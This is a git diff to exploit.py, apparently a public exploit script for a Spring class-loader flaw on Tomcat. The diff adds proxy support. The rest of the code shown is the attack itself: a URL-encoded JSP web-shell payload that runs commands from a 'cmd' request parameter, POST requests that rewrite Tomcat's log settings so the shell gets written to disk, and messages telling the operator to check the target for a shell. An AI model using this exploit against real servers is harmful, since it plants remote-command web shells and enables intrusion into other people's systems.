reznok · Talhasen · Jun 10, 2022
diff --git a/exploit.py b/exploit.py
@@ -20,8 +20,12 @@
     "c": "Runtime",
 }
 
+proxies = {
+   'http': 'http://proxy.example.com:8080',
+   'https': 'https://proxy.example.com:8090'
+}
 
-def run_exploit(url, directory, filename):
+def run_exploit(url, directory, filename, proxy_arg):
     log_pattern = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20" \
                   f"java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter" \
                   f"(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B" \
@@ -38,27 +42,27 @@ def run_exploit(url, directory, filename):
     # If re-running the exploit, this will create an artifact of {old_file_name}_.jsp
     file_date_data = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_"
     print("[*] Resetting Log Variables.")
-    ret = requests.post(url, headers=post_headers, data=file_date_data, verify=False)
+    ret = requests.post(url, proxies=proxies, headers=post_headers, data=file_date_data, verify=False)
     print("[*] Response code: %d" % ret.status_code)
 
     # Change the tomcat log location variables
     print("[*] Modifying Log Configurations")
-    ret = requests.post(url, headers=post_headers, data=exp_data, verify=False)
+    ret = requests.post(url, proxies=proxies, headers=post_headers, data=exp_data, verify=False)
     print("[*] Response code: %d" % ret.status_code)
 
     # Changes take some time to populate on tomcat
     time.sleep(3)
 
     # Send the packet that writes the web shell
-    ret = requests.get(url, headers=get_headers, verify=False)
+    ret = requests.get(url, proxies=proxies, headers=get_headers, verify=False)
     print("[*] Response Code: %d" % ret.status_code)
 
     time.sleep(1)
 
     # Reset the pattern to prevent future writes into the file
     pattern_data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
     print("[*] Resetting Log Variables.")
-    ret = requests.post(url, headers=post_headers, data=pattern_data, verify=False)
+    ret = requests.post(url, proxies=proxies, headers=post_headers, data=pattern_data, verify=False)
     print("[*] Response code: %d" % ret.status_code)
 
 
@@ -68,19 +72,28 @@ def main():
     parser.add_argument('--file', help='File to write to [no extension]', required=False, default="shell")
     parser.add_argument('--dir', help='Directory to write to. Suggest using "webapps/[appname]" of target app',
                         required=False, default="webapps/ROOT")
+    parser.add_argument('--proxy', help='Proxy like --proxy http://proxy.url:8080', required=False, default=None)
 
     file_arg = parser.parse_args().file
     dir_arg = parser.parse_args().dir
     url_arg = parser.parse_args().url
+    proxy_arg = parser.parse_args().proxy
 
     filename = file_arg.replace(".jsp", "")
 
+    global proxies
+    if proxy_arg is not None:
+        proxies["http"] = proxy_arg
+        proxies["https"] = proxy_arg
+        print("[+] Proxy configured")
+    else:
+        proxies = None
+
     if url_arg is None:
         print("Must pass an option for --url")
         return
-
     try:
-        run_exploit(url_arg, dir_arg, filename)
+        run_exploit(url_arg, dir_arg, filename, proxy_arg)
         print("[+] Exploit completed")
         print("[+] Check your target for a shell")
         print("[+] File: " + filename + ".jsp")